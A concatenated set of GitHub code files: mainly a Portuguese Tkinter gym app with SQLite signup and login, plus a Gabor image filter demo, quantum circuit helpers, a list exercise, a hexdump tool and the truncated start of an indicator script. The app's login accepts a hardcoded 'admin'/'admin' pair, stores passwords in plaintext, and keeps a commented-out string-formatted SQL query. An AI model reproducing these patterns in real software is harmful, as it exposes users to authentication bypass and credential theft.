self.pessoas: # Percorre a lista de Pessoas\r\n if len(i) < 3:\r\n self.contador1 += 1\r\n self.txt3 = Label(self.frame4, # Número - Quantidade de pessoas\r\n text=self.contador1,\r\n font=('Britannic', 45, 'bold'),\r\n bg = self.cor_cinza,\r\n fg='black')\r\n self.txt3.place(relx = 0.6, rely = 0.2)\r\n\r\n def clica_voltar(self): # Comando do botão\r\n self.hide()\r\n self.subframe = Tela_Inicial(self) # Próxima janela para ser aberta\r\n\r\n def hide(self):\r\n self.withdraw()\r\n def show(self):\r\n self.update()\r\n self.deiconify()\r\n\r\n# Tela para editar o Perfil \r\nclass Editar_Perfil(Toplevel): # ESSA 'class\"='\r\n # Atributos do app\r\n cor_laranja = '#f48c06'\r\n cor_cinza = '#ced4da'\r\n def __init__(self, original):\r\n self.original_frame = original\r\n Toplevel.__init__(self) # Importando o Metódo Construtor\r\n self.title('Editar Perfil') \r\n self.geometry('1340x680+290+200')\r\n self.configure(bg = 'white')\r\n # Ícone\r\n self.iconbitmap('powerup_icone.ico')\r\n\r\n self.widgets()\r\n\r\n def widgets(self):\r\n self.frame1 = Frame(self, bg = self.cor_laranja) # Frame para o título principal EDITAR PERFIL\r\n self.frame1.place(relx = 0, rely = 0, relwidth = 1, relheight = 0.13)\r\n\r\n self.titulo = Label(self.frame1, # Titulo 'EDTAR PERFIL'\r\n text='EDITAR PERFIL',\r\n font=('Britannic Bold', 30),\r\n bg=self.cor_laranja,\r\n fg='black')\r\n self.titulo.place(relx = 0.1, rely = 0.15)\r\n\r\n self.txt1 = Label(self, # Título 'Digite suas novas informações'\r\n text='Digite suas novas informações:',\r\n font=('Britannic', 20),\r\n bg='white',\r\n fg='black')\r\n self.txt1.place(relx = 0.1, rely = 0.15)\r\n\r\n self.nome = Label(self, # Título 'Nome:'\r\n text='Nome:',\r\n font=('Britannic Bold', 20),\r\n bg='white',\r\n fg='black')\r\n self.nome.place(relx = 0.1, rely = 0.22)\r\n\r\n self.nome_entry = Entry(self, # Entrada do novo nome \r\n bg=self.cor_cinza,\r\n fg='black',\r\n font=('Britannic Bold', 16))\r\n self.nome_entry.place(relx = 0.17, rely = 0.22, relwidth = 0.7, relheight = 0.06)\r\n\r\n self.nv_senha = Label(self, # Título 'Nova Senha:'\r\n text='Senha:',\r\n font=('Britannic Bold', 20),\r\n bg='white',\r\n fg='black')\r\n self.nv_senha.place(relx = 0.1, rely = 0.29)\r\n\r\n self.nv_senha_entry = Entry(self, # Entrada do nova senha\r\n bg=self.cor_cinza,\r\n show='*',\r\n fg='black',\r\n font=('Britannic Bold', 16))\r\n self.nv_senha_entry.place(relx = 0.17, rely = 0.29, relwidth = 0.7, relheight = 0.06)\r\n\r\n self.cnf_nv_senha = Label(self, # Título 'Confirma Senha:'\r\n text='Confirma Senha:',\r\n font=('Britannic Bold', 20),\r\n bg='white',\r\n fg='black')\r\n self.cnf_nv_senha.place(relx = 0.01, rely = 0.36)\r\n\r\n self.cnf_nv_senha_entry = Entry(self, # Entrada do nova senha\r\n bg=self.cor_cinza,\r\n show='*',\r\n fg='black',\r\n font=('Britannic Bold', 16))\r\n self.cnf_nv_senha_entry.place(relx = 0.17, rely = 0.36, relwidth = 0.7, relheight = 0.06)\r\n\r\n self.btn_atualiza = Button(self, # Botão de Atualizar Informações\r\n bg = self.cor_laranja,\r\n fg='white',\r\n text='Atualizar',\r\n font=('Britannic Bold', 20))\r\n self.btn_atualiza.place(relx = 0.75, rely = 0.45, relwidth = 0.17, relheight = 0.08)\r\n\r\n self.img = PhotoImage(file='btn_voltar.PNG') # Botão de voltar para a página anterior \r\n self.btn_voltar = Button(self, image=self.img, command= self.clica_voltar)\r\n self.btn_voltar.place(relx=0.1, rely=0.8)\r\n\r\n def clica_voltar(self): # Comando do botão\r\n self.hide()\r\n self.subframe = Tela_Inicial(self) # Próxima janela para ser aberta\r\n\r\n def hide(self):\r\n self.withdraw()\r\n def show(self):\r\n self.update()\r\n self.deiconify()\r\n\r\n# Tela do Menu Principal\r\nclass Tela_Inicial(Toplevel):\r\n # Atributos do app\r\n cor_laranja = '#f48c06'\r\n cor_cinza = '#ced4da'\r\n\r\n def __init__(self, original):\r\n self.original_frame = original\r\n Toplevel.__init__(self) # Importando o Metódo Construtor\r\n self.title('Bem-Vindo ao POWER UP') \r\n self.geometry('1340x680+290+200')\r\n self.configure(bg = 'white')\r\n # Ícone\r\n self.iconbitmap('powerup_icone.ico')\r\n\r\n self.widgets()\r\n\r\n def widgets(self):\r\n self.ip = randint(100, 1000) # Gerador de IP para a academia\r\n\r\n self.frame1 = Frame(self, bg = self.cor_laranja) # Frame para o título principal 'Olá...'\r\n self.frame1.place(relx = 0, rely = 0, relwidth = 1, relheight = 0.13)\r\n\r\n self.frame2 = Frame(self, bg=self.cor_cinza)\r\n self.frame2.place(relx= 0.8, rely= 0.9, relwidth=0.19, relheight=0.09)\r\n\r\n self.titulo = Label(self.frame1, # Titulo 'Olá teste001'\r\n text='Olá, teste001', # ESSA VÁRIAVELK PRECISAR SER RETIFICADA COMO UMA VÁRIAVEL CONECTADA AO BANCO DE DADOS\r\n font=('Britannic Bold', 30),\r\n bg=self.cor_laranja,\r\n fg='black')\r\n self.titulo.place(relx = 0.1, rely = 0.15)\r\n\r\n self.titulo = Label(self.frame2, # Demostra o IP da academia\r\n text=f'IP da Academia: {self.ip}', \r\n font=('Britannic Bold', 12),\r\n bg=self.cor_cinza,\r\n fg='black')\r\n self.titulo.place(relx = 0.01, rely = 0.05)\r\n\r\n ## Botões do Menu Principal ##\r\n self.img1 = PhotoImage(file='btn_edit_perfil.png') # Botão de Editar Perfil\r\n self.btn_edita = Button(self, image=self.img1, command= self.clica_btn_edita)\r\n self.btn_edita.place(relx=0.1, rely=0.3)\r\n\r\n self.img2 = PhotoImage(file='btn_fluxo.PNG') # Botão de Editar Perfil\r\n self.btn_fluxo = Button(self, image=self.img2, command= self.clica_btn_fluxo)\r\n self.btn_fluxo.place(relx=0.4, rely=0.3)\r\n\r\n self.img3 = PhotoImage(file='btn_edit_fichas.PNG') # Botão de Editar Perfil\r\n self.btn_edt_fichas = Button(self, image=self.img3, command= self.clica_btn_ficha)\r\n self.btn_edt_fichas.place(relx=0.7, rely=0.3) \r\n\r\n def clica_btn_edita(self): # Comando do botão\r\n self.hide()\r\n self.subframe = Editar_Perfil(self) # Próxima janela para ser aberta\r\n\r\n def clica_btn_fluxo(self): # Comando do botão\r\n self.hide()\r\n self.subframe = Tela_Fluxo(self) # Próxima janela para ser aberta\r\n\r\n def clica_btn_ficha(self): # Comando do botão\r\n self.hide()\r\n self.subframe = Tela_Fichas(self) # Próxima janela para ser aberta\r\n\r\n def hide(self):\r\n self.withdraw()\r\n def show(self):\r\n self.update()\r\n self.deiconify()\r\n\r\n# Tela de Cadastro\r\nclass Cadastro(Toplevel):\r\n # Atributos do app\r\n cor_laranja = '#f48c06'\r\n cor_cinza = '#ced4da'\r\n def __init__(self, original):\r\n self.original_frame = original\r\n Toplevel.__init__(self) # Importando o Metódo Construtor\r\n self.title('Cadastre-se no POWER UP') \r\n self.geometry('1340x680+290+200')\r\n self.configure(bg = 'white')\r\n # Ícone\r\n self.iconbitmap('powerup_icone.ico')\r\n\r\n self.widgets()\r\n\r\n def widgets(self):\r\n self.frame1 = Frame(self, bg = self.cor_laranja) # Frame para o título principal 'Cadastro'\r\n self.frame1.place(relx = 0, rely = 0.11, relwidth = 1, relheight = 0.13)\r\n\r\n self.titulo = Label(self.frame1, # Titulo 'CADASTRO'\r\n text='CADASTRO',\r\n font=('Britannic Bold', 30),\r\n bg=self.cor_laranja,\r\n fg='black')\r\n self.titulo.place(relx = 0.1, rely = 0.15)\r\n\r\n self.email = Label(self, # Título 'E-mail'\r\n text='E-mail:',\r\n font=('Britannic Bold', 20),\r\n bg='white',\r\n fg='black')\r\n self.email.place(relx = 0.15, rely = 0.28)\r\n\r\n self.email_entry = Entry(self, # Entrada de e-mail\r\n bg=self.cor_cinza,\r\n fg='black',\r\n font=('Britannic Bold', 16))\r\n self.email_entry.place(relx = 0.22, rely = 0.28, relwidth = 0.7, relheight = 0.06)\r\n\r\n self.nome = Label(self, # Título 'Nome'\r\n text='Nome:',\r\n font=('Britannic Bold', 20),\r\n bg='white',\r\n fg='black')\r\n self.nome.place(relx = 0.15, rely = 0.35)\r\n\r\n self.nome_entry = Entry(self, # Entrada do Nome\r\n bg=self.cor_cinza,\r\n fg='black',\r\n font=('Britannic Bold', 16))\r\n self.nome_entry.place(relx = 0.22, rely = 0.35, relwidth = 0.7, relheight = 0.06)\r\n\r\n self.senha = Label(self, # Título 'Senha'\r\n text='Senha:',\r\n font=('Britannic Bold', 20),\r\n bg='white',\r\n fg='black')\r\n self.senha.place(relx = 0.15, rely = 0.42)\r\n\r\n self.senha_entry = Entry(self, # Entrada de senha\r\n show = '*',\r\n bg=self.cor_cinza,\r\n fg='black',\r\n font=('Britannic Bold', 16))\r\n self.senha_entry.place(relx = 0.22, rely = 0.42, relwidth = 0.7, relheight = 0.06)\r\n\r\n self.conf_senha = Label(self, # Título 'Confirma Senha'\r\n text='Confirma Senha:',\r\n font=('Britannic Bold', 20),\r\n bg='white',\r\n fg='black')\r\n self.conf_senha.place(relx = 0.06, rely = 0.49)\r\n\r\n self.conf_senha_entry = Entry(self, # Entrada de confirmação\r\n show = '*',\r\n bg=self.cor_cinza,\r\n fg='black',\r\n font=('Britannic Bold', 16))\r\n self.conf_senha_entry.place(relx = 0.22, rely = 0.49, relwidth = 0.7, relheight = 0.06)\r\n\r\n self.btn_cadastra = Button(self, # Botão de Cadastrar\r\n bg = self.cor_laranja,\r\n fg='white',\r\n text='Cadastrar',\r\n font=('Britannic Bold', 20),\r\n command= self.novo_user)\r\n self.btn_cadastra.place(relx = 0.75, rely = 0.58, relwidth = 0.17, relheight = 0.08)\r\n\r\n self.img = PhotoImage(file='btn_voltar.PNG') # Botão de voltar para a página anterior \r\n self.btn_voltar = Button(self, image=self.img, command= self.onClose)\r\n self.btn_voltar.place(relx=0.1, rely=0.8)\r\n\r\n def limpa_tela(self):\r\n self.email_entry.delete(0, END)\r\n self.nome_entry.delete(0, END)\r\n self.senha_entry.delete(0, END)\r\n\r\n def confirma_senha(self): # Mensagem de confirmação para a entrada e verficação da confimação de tela\r\n if self.senha_entry.get() == self.conf_senha_entry.get():\r\n self.opcao = messagebox.askokcancel('POWER UP', 'Novo Usuário cadastrado com sucesso\\nClique em OK para entrar.')\r\n if self.opcao == True:\r\n self.clica_ok()\r\n\r\n else:\r\n messagebox.askokcancel('POWER UP', 'A confimação de senha não é correspondente. Insira novamente')\r\n self.senha_entry.delete(0, END)\r\n self.conf_senha_entry.delete(0, END)\r\n\r\n def novo_user(self):\r\n # Identificando se as variavéis estão preenchidas\r\n if self.nome_entry.get() == '':\r\n msg = \"Digite um nome para o usuário\"\r\n messagebox._show('Cadastro de usuário - Aviso!', msg)\r\n\r\n elif self.email_entry.get() == '':\r\n msg = \"Digite um email para o usuário\"\r\n messagebox._show('Cadastro de usuário - Aviso!', msg)\r\n\r\n elif self.senha_entry.get() == '':\r\n msg = \"Digite um senha para o usuário\"\r\n messagebox._show('Cadastro de usuário - Aviso!', msg)\r\n\r\n else:\r\n self.nome_var = self.nome_entry.get()\r\n self.email_var = self.email_entry.get()\r\n self.senha_var = self.senha_entry.get()\r\n\r\n # Incorpora os métodos user e executa\r\n self.ddl = DDL()\r\n self.ddl.insere_user(self.nome_var, self.email_var, self.senha_var)\r\n\r\n self.confirma_senha()\r\n self.limpa_tela() # método de limpar tela\r\n\r\n def clica_ok(self):\r\n self.hide()\r\n self.subframe = Tela_Inicial(self) # Próxima janela para ser aberta\r\n\r\n def onClose(self): # Comando do botão voltar \r\n self.destroy()\r\n self.original_frame.show()\r\n\r\n def hide(self):\r\n self.withdraw()\r\n def show(self):\r\n self.update()\r\n self.deiconify()\r\n\r\n# Tela Inicial \r\nclass Aplicativo:\r\n # Atributos do app\r\n cor_laranja = '#f48c06'\r\n cor_cinza = '#ced4da'\r\n\r\n def __init__(self): # Método Construtor\r\n self.root = root\r\n self.tela()\r\n self.widgets()\r\n\r\n # Entrada com 'Return'\r\n self.root.bind(\"\", self.clica_entrar)\r\n\r\n self.bd = DDL()\r\n self.bd.cria_tabela()\r\n\r\n root.mainloop()\r\n\r\n def tela(self): # Configurações de Tela\r\n self.root.title('POWER UP') \r\n self.root.geometry('1340x680+290+200')\r\n self.root.configure(bg=\"white\")\r\n # Ícone\r\n self.root.iconbitmap('powerup_icone.ico')\r\n\r\n def widgets(self):\r\n self.frame1 = Frame(self.root, bg = self.cor_laranja) # Frame para o título principal 'Entrar'\r\n self.frame1.place(relx = 0, rely = 0.11, relwidth = 1, relheight = 0.13)\r\n\r\n self.titulo = Label(self.frame1, # Titulo 'ENTRAR'\r\n text='ENTRAR',\r\n font=('Britannic Bold', 30),\r\n bg=self.cor_laranja,\r\n fg='black')\r\n self.titulo.place(relx = 0.1, rely = 0.15)\r\n\r\n self.email = Label(self.root, # Título 'E-mail'\r\n text='E-mail:',\r\n font=('Britannic Bold', 20),\r\n bg='white',\r\n fg='black')\r\n self.email.place(relx = 0.15, rely = 0.28)\r\n\r\n self.email_entry = Entry(self.root, # Entrada de e-mail\r\n bg=self.cor_cinza,\r\n fg='black',\r\n font=('Britannic Bold', 16))\r\n self.email_entry.place(relx = 0.22, rely = 0.28, relwidth = 0.7, relheight = 0.06)\r\n\r\n self.senha = Label(self.root, # Título 'Senha'\r\n text='Senha:',\r\n font=('Britannic Bold', 20),\r\n bg='white',\r\n fg='black')\r\n self.senha.place(relx = 0.15, rely = 0.35)\r\n\r\n self.senha_entry = Entry(self.root, # Entrada de senha\r\n show = '*',\r\n bg=self.cor_cinza,\r\n fg='black',\r\n font=('Britannic Bold', 16))\r\n self.senha_entry.place(relx = 0.22, rely = 0.35, relwidth = 0.7, relheight = 0.06)\r\n\r\n self.txt1 = Label(self.root, # Título 'Esquece sua Senha'\r\n text='Esqueceu sua senha?',\r\n font=('Britannic', 20),\r\n bg='white',\r\n fg='black')\r\n self.txt1.place(relx = 0.15, rely = 0.43)\r\n\r\n self.btn_senha = Button(self.root, # Botão de Esqueceu a Senha\r\n bg = self.cor_laranja,\r\n fg='white',\r\n text='Substituir Senha',\r\n font=('Britannic Bold', 20))\r\n self.btn_senha.place(relx = 0.17, rely = 0.5, relwidth = 0.17, relheight = 0.06)\r\n\r\n self.btn_entrar = Button(self.root, # Botão de Entrar\r\n bg = self.cor_laranja,\r\n fg='white',\r\n text='Entrar',\r\n font=('Britannic Bold', 20),\r\n command=self.clica_entrar)\r\n self.btn_entrar.place(relx = 0.75, rely = 0.43, relwidth = 0.17, relheight = 0.08) \r\n\r\n self.txt2 = Label(self.root, # Título 'Não possui cadastro'\r\n text='Caso não possua conta, clique em cadastre-se:',\r\n font=('Britannic', 20),\r\n bg='white',\r\n fg='black')\r\n self.txt2.place(relx = 0.15, rely = 0.7)\r\n\r\n self.btn_cadastro = Button(self.root, # Botão de Cadastro\r\n bg = self.cor_laranja,\r\n fg='white',\r\n text='Cadastra-se',\r\n font=('Britannic Bold', 20),\r\n command= self.clica_cadastro)\r\n self.btn_cadastro.place(relx = 0.17, rely = 0.76, relwidth = 0.17, relheight = 0.08)\r\n\r\n def limpa_tela(self):\r\n self.email_entry.delete(0, END)\r\n self.senha_entry.delete(0, END)\r\n\r\n def clica_cadastro(self): # Comando do botão\r\n self.hide()\r\n self.subframe = Cadastro(self) # Próxima janela para ser aberta\r\n\r\n def clica_entrar(self, *args): # Comando do botão\r\n self.email_var = self.email_entry.get()# Atribui o email para a varíavel 'self.email_var'\r\n self.senha_var = self.senha_entry.get() # Atribui o senha para a varíavel 'self.senha var'\r\n\r\n if self.email_var == '':\r\n messagebox._show('Cadastro de usuário - Aviso!', 'Digite um email para o usuário')\r\n\r\n elif self.senha_var == '':\r\n messagebox._show('Cadastro de usuário - Aviso!', 'Digite um senha para o usuário')\r\n \r\n else:\r\n self.email_var = self.email_entry.get()# Atribui o email para a varíavel 'self.email_var'\r\n self.senha_var = self.senha_entry.get() # Atribui o senha para a varíavel 'self.senha var'\r\n\r\n if self.bd.verifica_cliente(self.email_var, self.senha_var) == 'Confirmado':\r\n self.limpa_tela()\r\n self.hide()\r\n self.tela_inicial = Tela_Inicial(self) # Verifica o cliente no banco de dados - ESSA FUNCIONALIDADE PRECISA SER REFATORADA\r\n \r\n def hide(self):\r\n self.root.withdraw()\r\n def show(self):\r\n self.root.update()\r\n self.root.deiconify()\r\n\r\nclass DDL: # Manipulação da Tabela\r\n contimetro = 0 # Varíavel que ontabiliza a quantidade de tentativas do usuário\r\n\r\n def variaveis(self, nome, email, senha):\r\n self.email_var = email\r\n self.nome_var = nome\r\n self.senha_var = senha\r\n\r\n def conecta_bd(self):\r\n self.conn = sqlite3.connect('pup_dates.db') # Conectando com o Banco de Dados do Aplicativo\r\n self.cur = self.conn.cursor() # Cursor de busca no Banco de Dados\r\n print('Conectado ao Banco de Dados')\r\n\r\n def desconecta_bd(self):\r\n self.conn.close()\r\n print('Desconectado do Banco de Dados')\r\n\r\n def cria_tabela(self):\r\n self.conecta_bd()\r\n self.cur.execute('''CREATE TABLE IF NOT EXISTS users(id INT AUTO_INCREMENT PRIMARY KEY, nome_cliente varchar(80), email_cliente varchar(80), senha_cliente varchar(80))''')\r\n self.conn.commit()\r\n print('Banco de Dados criado com sucesso')\r\n self.desconecta_bd()\r\n\r\n def insere_user(self, nome, email, senha): # Insere o novo usuário no BD\r\n # Executa no Banco de Dados \r\n self.conecta_bd()\r\n # Verifica se o cliente já é cadastrado.\r\n self.verifica_cliente(email, senha)\r\n self.cur.execute(\"\"\"\r\n INSERT INTO users(nome_cliente, email_cliente, senha_cliente)\r\n VALUES(?, ?, ?);\"\"\", (nome, email, senha))\r\n self.conn.commit()\r\n print('Valores Inseridos')\r\n self.desconecta_bd()\r\n\r\n def verifica_cliente(self, email, senha): # Método para verificar o usuário no BD\r\n print(\"\\nVerficando Cliente\\n\") \r\n #self.conecta_bd()\r\n\r\n # VERIFICANDO EM UMA CONDIÇÃO FORA DO BANDO DE DADOS\r\n if email == 'admin' and senha == 'admin':\r\n #self.verfica = self.cur.execute(\"SELECT * FROM users WHERE email_cliente = {}\".format(email)) # Comando de verificação do usuário no Bando da Dados\r\n return 'Confirmado'\r\n \r\n else:\r\n messagebox.askokcancel('POWER UP', 'A senha ou e-mail não correposnde a um usuário cadastrado')\r\n #self.desconecta_bd()\r\n\r\n##### PROGRAMA PRINCIPAL #####\r\nroot = Tk()\r\nAplicativo()","repo_name":"Leopoldino005/POWER-UP","sub_path":"main_up.py","file_name":"main_up.py","file_ext":"py","file_size_in_byte":33017,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"6912695699","text":"from skimage import data, filters\nimport matplotlib.pyplot as plt\n\nimg = data.camera()\n\nfilter_real, filter_image = filters.gabor(img, frequency=0.7)\n\nfig, (x, y, z) = plt.subplots(ncols=3, figsize=(15, 6))\nx.imshow(img)\ny.imshow(filter_real, cmap=\"gray\")\nz.imshow(filter_image, cmap=\"gray\")\n\nplt.figure(figsize=(30, 8))\n\nplt.subplot(131)\nplt.imshow(img)\n\nplt.subplot(132)\nplt.imshow(filter_real)\n\nplt.subplot(133)\nplt.imshow(filter_image)\n\nplt.tight_layout()\nplt.show()\n","repo_name":"finepix/py_workspace","sub_path":"opencv_learn/gabor.py","file_name":"gabor.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"44"} +{"seq_id":"32465449726","text":"import pandas as pd\nimport numpy as np\n\n\n\n\"\"\"\nTo do: find a better name for channel_param as default for loading channel params (since you might also have some other stuff...)\n\"\"\"\n\ndef u2_db(translator,a,b,**kwargs):\n block_id = kwargs.get(\"block_id\",0)\n params = kwargs.get(\"params\",True)\n def give_param(params, k):\n if params is not True:\n return None\n else:\n return np.random.normal(0,2*np.pi)\n return pd.DataFrame([gate_template(k, block_id=block_id, param_value = give_param(params,k)) for i,k in enumerate(u2(translator,a,b))])\n\ndef u1_db(translator,q,**kwargs):\n block_id = kwargs.get(\"block_id\",0)\n params = kwargs.get(\"params\",True)\n def give_param(params, k):\n if params is not True:\n return None\n else:\n return np.random.normal(0,2*np.pi)\n return pd.DataFrame([gate_template(k, block_id=block_id, param_value = give_param(params,k)) for i,k in enumerate(u1(translator,q))])\n\ndef u2_layer(translator,**kwargs):\n block_id = kwargs.get(\"block_id\",0)\n dd = u2_db(translator,0,1)\n for i in range(1,translator.n_qubits):\n dd = concatenate_dbs([dd,u2_db(translator,i,(i+1)%translator.n_qubits, block_id=block_id)])\n return dd\n\ndef u1_layer(translator, **kwargs):\n block_id = kwargs.get(\"block_id\",0)\n params = kwargs.get(\"params\",True)\n qubits_ind = kwargs.get(\"qubits_ind\",None)\n if qubits_ind is None:\n qubits_ind = list(range(translator.n_qubits))\n dd = u1_db(translator,qubits_ind[0], block_id=block_id, params = params)\n for i in qubits_ind[1:]:\n dd = concatenate_dbs([dd,u1_db(translator,i, block_id=block_id, params = params)])\n return dd\n\n\ndef x_layer(translator, **kwargs):\n block_id = kwargs.get(\"block_id\",0)\n params = kwargs.get(\"params\",True)\n qubits_ind = kwargs.get(\"qubits_ind\",None)\n if qubits_ind is None:\n qubits_ind = list(range(translator.n_qubits))\n def give_param(params):\n if params is not True:\n return None\n else:\n return np.random.normal(0,2*np.pi)\n xx = pd.DataFrame([gate_template(k, param_value=0.,block_id=block_id, params=give_param(params)) for k in [translator.number_of_cnots + translator.n_qubits+j for j in qubits_ind]])\n return xx\n\ndef z_layer(translator,**kwargs):\n block_id = kwargs.get(\"block_id\",0)\n random_param = kwargs.get(\"block_id\", True)\n random_param = lambda x: 0. if x is False else np.float32(np.pi*np.random.random())\n zz = pd.DataFrame([gate_template(k, param_value=random_param(random_param), block_id=block_id) for k in [translator.number_of_cnots +j for j in range(translator.n_qubits)]])\n return zz\n\ndef cnot_layer(translator, **kwargs):\n touching = kwargs.get(\"touching\",False)\n block_id = kwargs.get(\"block_id\",0)\n if touching is True:\n inds_cnots = range(0,translator.n_qubits,2)\n else:\n inds_cnots = range(0,translator.n_qubits)\n cnots = [translator.cnots_index[str([k,(k+1)%translator.n_qubits])] for k in inds_cnots]\n return pd.DataFrame([gate_template(k, block_id=block_id) for k in cnots])\n\n\ndef concatenate_dbs(dbs):\n d = dbs[0]\n for dd in dbs[1:]:\n d = pd.concat([d,dd])\n d = d.reset_index(drop=True)\n return d\n\ndef what_if_none(x,alternative=None):\n \"\"\"\n aid method for give_gate_template\n \"\"\"\n if x is None:\n return alternative\n else:\n return x\n\ndef gate_template(ind,**kwargs):\n \"\"\"\n Creates a dictionary (that is later converted into pandas dataframe) describing rows of gate associated to ind. Used as initialization shortcut.\n gate_id: {\"param_value\":None, \"trainable\":True, \"block_id\":0, \"movable\":True}\n \"\"\"\n dicti = {\"ind\": ind}\n dicti[\"symbol\"] = what_if_none(kwargs.get(\"symbol\"))\n dicti[\"param_value\"] = what_if_none(kwargs.get(\"param_value\"),None)\n dicti[\"trainable\"] = what_if_none(kwargs.get(\"trainable\"),True)\n dicti[\"block_id\"] = what_if_none(kwargs.get(\"block_id\"), 0)\n\n qubits = kwargs.get(\"qubits\", None)\n if qubits is not None:\n dicti[\"qubits\"] = qubits\n\n channel_param = kwargs.get(\"channel_param\", False)\n if (channel_param is True):\n dicti[\"channel_param\"] = True\n return dicti\n\n\ndef rz(translator, q):\n return translator.number_of_cnots + q\ndef rx(translator, q):\n return translator.number_of_cnots + translator.n_qubits + q\ndef ry(translator, q):\n return translator.number_of_cnots + 2*translator.n_qubits + q\ndef cnot(translator, q0, q1):\n return translator.cnots_index[str([q0,q1])]\ndef u1(translator, q):\n return [rz(translator, q), rx(translator,q), rz(translator,q)]\ndef u2(translator, q0, q1):\n \"\"\"general two-qubit gate\"\"\"\n l=[ u for u in u1(translator,q0)]\n for u in u1(translator, q1):\n l.append(u)\n l.append(cnot(translator,q0,q1))\n l.append(rz(translator,q0))\n l.append(ry(translator,q1))\n l.append(cnot(translator,q1,q0))\n l.append(ry(translator,q1))\n l.append(cnot(translator,q0,q1))\n for u in u1(translator, q0):\n l.append(u)\n for u in u1(translator, q1):\n l.append(u)\n return l\n\n\n### channels\ndef amplitude_damping_db(translator, qubits_ind, eta, block_id=1, entire_circuit=False):\n \"\"\"\n qubits_ind: list of indices of the qubits ---> [system, ancilla (environment)]\n block_id: number that VANs uses to identify the channel and not touch it.\n eta: damping strength (note that the rotation is twice the value!)\n \"\"\"\n channel = []\n if not hasattr(translator, \"discard_qubits\"):\n raise AttributeError(\"please specify environment qubits, just ot keep track of things. For instance, this is used in the minimizer\")#translator.env_qubits = []\n if qubits_ind[1] not in translator.discard_qubits:\n raise AttributeError(\"please check your env qubits & order in which qubits this template are called for, otherwise things can mess up.\")\n if block_id not in translator.untouchable_blocks:\n raise AttributeError(\"please check your untouchable_blocks.\")\n\n ## controlled-Ry(2*eta)\n ### H on each qubit\n for qindex in qubits_ind: ##list on qubits suffering from the channel\n channel.append( translator.number_of_cnots + 3*translator.n_qubits + qindex )\n ###CNOT[q1,q0]\n channel.append(translator.cnots_index[str(qubits_ind[::-1])])\n ###Ry(eta)(q1)\n channel.append(translator.number_of_cnots + 2*translator.n_qubits + qubits_ind[1] )\n ###CNOT[q1,q0]\n channel.append(translator.cnots_index[str(qubits_ind[::-1])])\n ### H on eahc qubit\n for qindex in qubits_ind:\n channel.append( translator.number_of_cnots + 3*translator.n_qubits + qindex )\n ### Ry(2*eta)(q1)\n channel.append(translator.number_of_cnots + 2*translator.n_qubits + qubits_ind[1] )\n\n\n ## CNOT[q1,q0]\n channel.append(translator.cnots_index[str(qubits_ind[::-1])])\n\n index_eta = translator.number_of_cnots + 2*translator.n_qubits + qubits_ind[1]\n give_value_eta = lambda x, eta_value: None if x!= index_eta else eta_value\n is_rotation = lambda x: True if translator.number_of_cnots<=x maior:\r\n maior = num[c]\r\n elif num[c] < menor:\r\n menor = num[c]\r\n\r\nprint(f'Os valores digitados na lista foram: {num}')\r\nprint(f'O maior valor da lista foi: {maior} nas posições: ',end='')\r\nfor i, v in enumerate(num):\r\n if v == maior:\r\n print(f'{i}...',end='')\r\nprint()\r\nprint(f'O menor valor da lista foi: {menor} nas posições: ',end='')\r\nfor i, v in enumerate(num):\r\n if v == menor:\r\n print(f'{i}...',end='')\r\nprint()\r\n\r\n","repo_name":"JonathanRodrigues123/meus-estudos-python","sub_path":"Mundo 3 - Exercicios/Ex078 - listas parte 1.py","file_name":"Ex078 - listas parte 1.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70800001093","text":"import sys\n\n# flake8: noqa\n\n#To run this program, enter into the command line: 'python hexdump.py filename'\n#For example, for hi.txt, type: 'python hexdump.py hi.txt'\n\ndef main():\n data = openAndReadFile()\n dataLC = determinePrinatableAscii(data)\n printHexOutput(data, dataLC)\n\n\ndef openAndReadFile():\n fd = open(sys.argv[1], \"rb\")\n data = fd.read()\n #print(len(data))\n return data\n\ndef determinePrinatableAscii(data):\n dataListCopy = []\n # determine if a character is printable ascii\n for el in data:\n # if it is, then append it to the list so that it may be printed\n if int(hex(el), 16) >= int(hex(32), 16) and int(hex(el), 16) <= int(hex(126), 16):\n dataListCopy.append(chr(el))\n # else the character is not printable ascii, so append a period in it's place\n else:\n dataListCopy.append(\".\")\n return dataListCopy\n\ndef printHexOutput(d, dLC):\n d = list(d)\n dataListCopyHex = []\n for el in d:\n dataListCopyHex.append(f\"{el:x}\".rjust(2, \"0\"))\n\n for i in range(len(dataListCopyHex)):\n if i % 16 == 0:\n if len(dataListCopyHex) - i > 15:\n print(\"{:08x}\".format(i), end=\" \")\n print(\" \".join(dataListCopyHex[i: i + 8]), end=\" \")\n print(\" \".join(dataListCopyHex[i + 8: i + 16]), end=\" \")\n print(\"|\" + \"\".join(dLC[i: i + 16]) + \"|\")\n else:\n length = len(\n \"{:08x}\".format(i)\n + \" \"\n + \" \".join(dataListCopyHex[i: i + 8])\n + \" \".join(dataListCopyHex[i + 8: i + 16])\n )\n print(\n \"{:08x}\".format(i)\n + \" \"\n + \" \".join(dataListCopyHex[i: i + 8])\n + \" \"\n + \" \".join(dataListCopyHex[i + 8: i + 16]),\n end=\"\",\n )\n print(\"|\".rjust(59 - length), end=\"\")\n print(\"\".join(dLC[i: i + 16]) + \"|\")\n if len(dLC) - 1 == i:\n print(\"{:08x}\".format(i + 1), end=\"\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TBuckets6/hexdump-implementation","sub_path":"hexdump.py","file_name":"hexdump.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39451309613","text":"# based on https://bitbucket.org/cpbotha/indicator-cpuspeed/src\n\n# work in progress...\n\n# to run it, you'll need to, after installgin your env3 virtualenv:\n# pushd env3/lib/python3.5/site-packages\n# ln -s /usr/lib/python3/dist-packages/gi/ .\n# popd\n\nfrom __future__ import print_function, division\nfrom os import path\nfrom os.path import join\nimport os.path\nimport traceback\nimport yaml\nimport sys\nimport argparse\nimport requests\nimport json\nimport subprocess\nfrom gi.repository import Gtk, GLib\n\ntry: \n from gi.repository import AppIndicator3 as AppIndicator \nexcept: \n from gi.repository import AppIndicator\n\nimport re\nimport jobs\nimport launch\n\nscript_dir = path.dirname(path.realpath(__file__))\napi_url = 'https://api.jarvice.com/jarvice'\n\nparser = 